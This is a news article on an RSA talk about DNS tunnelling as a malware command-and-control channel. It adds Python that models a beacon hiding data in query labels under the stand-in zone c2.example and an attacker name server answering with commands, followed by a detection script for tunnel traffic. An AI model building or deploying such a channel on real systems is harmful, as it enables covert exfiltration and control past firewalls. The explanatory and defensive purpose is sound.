One of the more embarrassing revelations from last week's RSA Security conference in San Francisco was that bigger businesses take longer to discover security breaches. The DNSChanger Trojan, which was in the wild in 2009 and whose proprietors were busted last November, is still leaving damage behind in government systems, days before a scheduled deadline (now extended) for it to have been eradicated.
And yet the DNS-changing malware, so deceptively simple it can't even legitimately be called a hack, may still be sitting undetected in targeted systems. At RSA last week, SANS Institute Faculty Fellow Ed Skoudis, a well-known author in the anti-malware field for over two decades, reiterated the dangers of leaving DNS open as a command-and-control channel for outsiders.
A decade ago, malicious agents would plant back doors that listened on inbound TCP ports, waiting for the attacker to connect in. Some of them were detectable through port scans, which became a regular procedure in scouring for bad actors.
Skoudis told RSA last week that back doors have since evolved: instead of waiting for an inbound connection, the implant reaches out over the enterprise's own outbound connections. Most networks are, after all, configured to allow outbound traffic. Some of that outbound traffic is even wrapped in SSL or TLS as HTTPS, which hides the commands from inspection. And some modern malware gets its commands from loosely masqueraded Twitter feeds, or Facebook or YouTube comments. If you've been wondering about the proliferation of nonsensical Twitter feeds and thinking, what exactly are they doing, now you know.
"The issue here, though, is that each of these mechanisms requires the malware on the affected machine to have a direct outbound connection to where the bad guy places his commands," Skoudis explained. "So if we as defenders could sever that connection - if the inbound machine can't get out - we fix the problem... well, not so much."
After feigning a self-correction, Skoudis went on to explain that modern malware doesn't need an outbound connection of its own at all. It simply asks the machine's normal, internal DNS server to resolve names under a domain the attacker controls, and lets ordinary recursive resolution carry the query out to the attacker's authoritative name server and the answer back in. That gives the malicious agent command and control through a resolver chain that never looks like a connection to the outside, he explained, pointing to the possibility of a name resolution system that works exclusively for malware, passing commands in names and records that needn't even look like well-formed hostnames.
And so much for the firewall. "With malware on the infected machine... that machine does not have outbound connectivity at all. If it tries to send traffic through the firewall, it's blocked. No TCP, no UDP, no ICMP. Instead, it sends a DNS query just to its internal DNS server. The internal DNS server then looks that name up for it by maybe sending it to an external DNS server on the DMZ, which may even forward out to an external DNS server on the Internet, which could do a full recursive lookup, ultimately getting to the bad guys' server."
That recursive lookup can carry a command back in the response, which is delivered to the malware on the infected machine and executed, perhaps with elevated privileges. Nothing in the chain ever saw an outbound connection from that host. "This is very subtle," said Skoudis.
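To make the mechanism concrete, here is an added example, written for this article and not code from Skoudis's talk or from any real malware, that models both ends of the channel in Python. The infected host builds an ordinary DNS query whose labels carry its data; the attacker's authoritative server, modelled here as a function, decodes those labels and answers with a TXT record carrying the next command. The resolver chain in between (internal server, DMZ forwarder, recursive lookup) is elided because it just passes the packets along unchanged. The zone name c2.example, the host ID, the use of TXT records and base32 encoding are all assumptions for illustration.

```python
import base64
import struct

C2_ZONE = "c2.example"   # attacker-controlled zone (assumed for this example)
MAX_LABEL = 63           # RFC 1035: a single label is at most 63 bytes
MAX_NAME = 253           # practical limit on a dotted name


def encode_name(name):
    """Encode a dotted name in DNS wire format (length-prefixed labels)."""
    out = b""
    for label in name.split("."):
        raw = label.encode()
        if len(raw) > MAX_LABEL:
            raise ValueError("label too long")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg, off):
    """Decode an uncompressed wire-format name at off; return (name, new_off)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode())
        off += n
    return ".".join(labels), off


def build_beacon_query(host_id, data, txid):
    """Infected host: hide `data` in the labels of a TXT query under C2_ZONE.

    base32 keeps the labels inside the hostname alphabet; padding is stripped
    and restored on the other side.
    """
    payload = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    qname = ".".join(labels + [host_id, C2_ZONE])
    if len(qname) > MAX_NAME:
        raise ValueError("too much data for one query; split it across several")
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1, one question
    return header + encode_name(qname) + struct.pack(">HH", 16, 1)  # QTYPE=TXT, IN


def authoritative_server(query, pending_commands):
    """Attacker's name server: recover the data, answer with the next command."""
    txid = struct.unpack(">H", query[:2])[0]
    qname, off = decode_name(query, 12)
    if not qname.endswith("." + C2_ZONE):
        raise ValueError("not authoritative for this name")
    labels = qname.split(".")
    zone_len = len(C2_ZONE.split("."))
    host_id = labels[-zone_len - 1]
    b32 = "".join(labels[:-zone_len - 1]).upper()
    b32 += "=" * (-len(b32) % 8)
    data = base64.b32decode(b32)
    # Default command keeps the implant quiet when nothing is queued (assumed).
    cmd = pending_commands.get(host_id, "sleep 3600").encode()
    txt = base64.b64encode(cmd)
    rdata = bytes([len(txt)]) + txt                    # TXT: one character-string
    hdr = struct.pack(">HHHHHH", txid, 0x8400, 1, 1, 0, 0)  # QR=1, AA=1, one answer
    question = query[12:off + 4]
    # 0xc00c points back at the question name; TTL 5 so caches don't replay it.
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 16, 1, 5, len(rdata)) + rdata
    return hdr + question + answer, host_id, data


def parse_command(response):
    """Infected host: pull the command back out of the TXT answer."""
    _, off = decode_name(response, 12)
    off += 4                       # QTYPE, QCLASS
    off += 2                       # compression pointer to the question name
    _, _, _, rdlen = struct.unpack(">HHIH", response[off:off + 10])
    off += 10
    txt_len = response[off]
    return base64.b64decode(response[off + 1:off + 1 + txt_len]).decode()


def round_trip(host_id, data, commands, txid=0x1234):
    """One beacon: host -> (resolver chain) -> attacker -> (chain) -> host."""
    query = build_beacon_query(host_id, data, txid)
    response, seen_host, seen_data = authoritative_server(query, commands)
    return seen_host, seen_data, parse_command(response)


if __name__ == "__main__":
    print(round_trip("wks-042", b"uid=0 os=win7", {"wks-042": "run whoami"}))
```

Every byte the host emits is a syntactically valid query for its own resolver; the only thing that distinguishes it from a lookup for a CDN node is the length and look of the labels and the zone they sit under, which is exactly what the detection advice later in the piece keys on.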
The FBI's indictment against the Estonian proprietors of the DNSChanger malware last November told a story of how the malware redirected DNS queries to one of a surprisingly large network of DNS server addresses the group had amassed. The sole objective there was allegedly to display ads their system hosted in place of the ads and pages users frequently visit, for example instead of Yahoo or Netflix or even the IRS. Ed Skoudis' warning is of something even more sinister. He speaks of a distribution mechanism where, ultimately, an agent on your computer and an agent on the Internet have full two-way communication straight through firewalls, by masquerading as the service upon which the Web completely depends: the domain name resolution system. If getting the malware inside your machine is as easy as the DNSChanger folks demonstrated, by having an upstream server masquerade as the DHCP configuration server normally used by Wi-Fi routers, then there could be a gaping security hole in the Internet right now. In a backwards way, the DNSChanger folks may have done the world a favor.
The theoretical ability for such a malicious network to be established has existed perhaps since the beginning of the Internet, Skoudis told the RSA audience, though he has only seen it put to the test recently, with a new set of tools responsible for at least two large-scale breaches he has seen within the last eight months.
His suggestions for defending against this vulnerability: "First, look for unusual DNS traffic. This introduces strange patterns of DNS traffic, very frequent barrages of requests, maybe sent to places in the world that you're not normally doing business in." While logging all DNS responses would cause systems to take too big a performance hit, simply sniffing outbound requests on the perimeter network could reveal anomalous patterns or unusually long queries with strange names. One free tool Skoudis suggested is DNSCAT by Ron Bowes.
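As an added example, not from the article or from the talk, the following Python applies that first suggestion to a DNS query log: it looks for the unusually long, random-looking labels and the barrage of distinct names under one zone that a tunnel produces, which is what a perimeter sniffer would have to key on. The log lines are constructed for the example (10.1.4.22 is an ordinary workstation, 10.1.4.37 is beaconing), and the zone name, host addresses and thresholds are assumptions to be tuned against a real baseline.

```python
import math
from collections import defaultdict

# Constructed sample log (not real traffic): timestamp, source IP, query name, type.
SAMPLE_LOG = """\
2012-03-05T10:00:01 10.1.4.22 www.yahoo.com A
2012-03-05T10:00:01 10.1.4.22 mail.google.com A
2012-03-05T10:00:02 10.1.4.22 e3191.dscc.akamaiedge.net A
2012-03-05T10:00:03 10.1.4.22 ctldl.windowsupdate.com A
2012-03-05T10:00:03 10.1.4.22 calendar.google.com A
2012-03-05T10:00:05 10.1.4.37 k5sxg5djmfxgsylemnwgc4tunrxw2ytf.wks-042.c2.example TXT
2012-03-05T10:00:06 10.1.4.37 mnwwc3tomvzq4ytpom3gkzlemvxgc2ln.wks-042.c2.example TXT
2012-03-05T10:00:07 10.1.4.37 nbswy3dpeb2w64tmmrxwe2lmnfxgo3dp.wks-042.c2.example TXT
2012-03-05T10:00:08 10.1.4.37 gfxw2zlnmfzxi4dpnqxgiidomzqwg5dr.wks-042.c2.example TXT
2012-03-05T10:00:09 10.1.4.37 orsxg5bnmfzgk5djmvzxi4tbnruw4zlr.wks-042.c2.example TXT
2012-03-05T10:00:09 10.1.4.37 www.yahoo.com A
"""

# Thresholds are assumptions; tune them against your own traffic baseline.
LONG_LABEL = 24        # a single label this long looks encoded rather than named
HIGH_ENTROPY = 3.0     # bits per character; human-chosen labels are usually lower
MANY_SUBDOMAINS = 4    # distinct names under one zone from one host in the window


def shannon_entropy(s):
    """Bits of entropy per character in s."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_label(qname):
    return max(qname.split("."), key=len)


def looks_encoded(qname):
    """True when the longest label is both long and random-looking."""
    lab = longest_label(qname)
    return len(lab) >= LONG_LABEL and shannon_entropy(lab) >= HIGH_ENTROPY


def parse_line(line):
    ts, src, qname, qtype = line.split()
    return ts, src, qname.rstrip(".").lower(), qtype


def analyze(log_text):
    """Return {(src, zone): [reasons]} for hosts whose DNS traffic looks tunnelled."""
    names = defaultdict(set)     # (src, zone) -> distinct query names
    txt_count = defaultdict(int)  # (src, zone) -> number of TXT lookups
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, src, qname, qtype = parse_line(line)
        zone = ".".join(qname.split(".")[-2:])   # crude registrable-domain guess
        names[(src, zone)].add(qname)
        if qtype == "TXT":
            txt_count[(src, zone)] += 1

    flagged = {}
    for key, qnames in names.items():
        reasons = []
        encoded = [q for q in qnames if looks_encoded(q)]
        if encoded:
            reasons.append("%d queries with long high-entropy labels" % len(encoded))
        if len(qnames) >= MANY_SUBDOMAINS:
            reasons.append("%d distinct names under %s" % (len(qnames), key[1]))
        if txt_count[key] and txt_count[key] == len(qnames):
            reasons.append("every lookup was a TXT query")
        # Encoded labels alone are strong; the weaker signals need to agree.
        if encoded or len(reasons) >= 2:
            flagged[key] = reasons
    return flagged


if __name__ == "__main__":
    for (src, zone), why in analyze(SAMPLE_LOG).items():
        print(src, zone, "; ".join(why))
```

Grouping by source host and zone rather than by individual query is what catches the "barrage of requests" Skoudis describes: each tunnel query is unique, so per-name caching and per-name counters never see it twice, but the zone under which they all sit stays constant.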